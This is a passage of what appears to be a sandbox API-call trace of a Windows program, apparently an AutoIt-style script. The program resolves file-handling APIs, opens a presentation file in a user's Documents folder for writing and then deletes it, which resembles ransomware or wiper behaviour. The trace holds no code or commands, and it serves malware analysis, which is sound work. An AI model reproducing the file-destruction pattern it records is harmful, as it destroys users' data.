out: lpsz="MEMSET") returned 0x6 [0033.856] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.856] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0033.856] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.857] FreeLibrary (hLibModule=0x76b40000) returned 1 [0033.857] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.857] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.857] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0033.857] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0033.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.860] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.860] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.860] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.860] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.860] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd90 [0033.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x88cd90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0033.861] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\6v0 igsxnne4wy28.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.861] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.861] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.861] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.861] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0033.861] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0033.861] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0033.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.862] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.862] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0033.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88cdc0 [0033.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88cdc0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0033.862] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.862] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.863] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0033.863] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0033.863] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0033.863] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0033.863] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.863] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.863] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7d8 [0033.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c7d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0033.864] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.864] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.864] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.864] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0033.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.864] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps", lpFilePart=0x0) returned 0x6c [0033.864] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ea7870, ftCreationTime.dwHighDateTime=0x1d5b8f7, ftLastAccessTime.dwLowDateTime=0xeae0d5a0, ftLastAccessTime.dwHighDateTime=0x1d5c152, ftLastWriteTime.dwLowDateTime=0x141207c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x18da3, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="6v0 IGSxNnE4wY28.pps", cAlternateFileName="6V0IGS~1.PPS")) returned 0x7c2100 [0033.864] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\6v0 igsxnne4wy28.pps")) returned 1 [0033.867] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ea7870, ftCreationTime.dwHighDateTime=0x1d5b8f7, ftLastAccessTime.dwLowDateTime=0xeae0d5a0, ftLastAccessTime.dwHighDateTime=0x1d5c152, ftLastWriteTime.dwLowDateTime=0x141207c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x18da3, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="6v0 IGSxNnE4wY28.pps", cAlternateFileName="6V0IGS~1.PPS")) returned 0 [0033.867] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0033.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0033.868] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 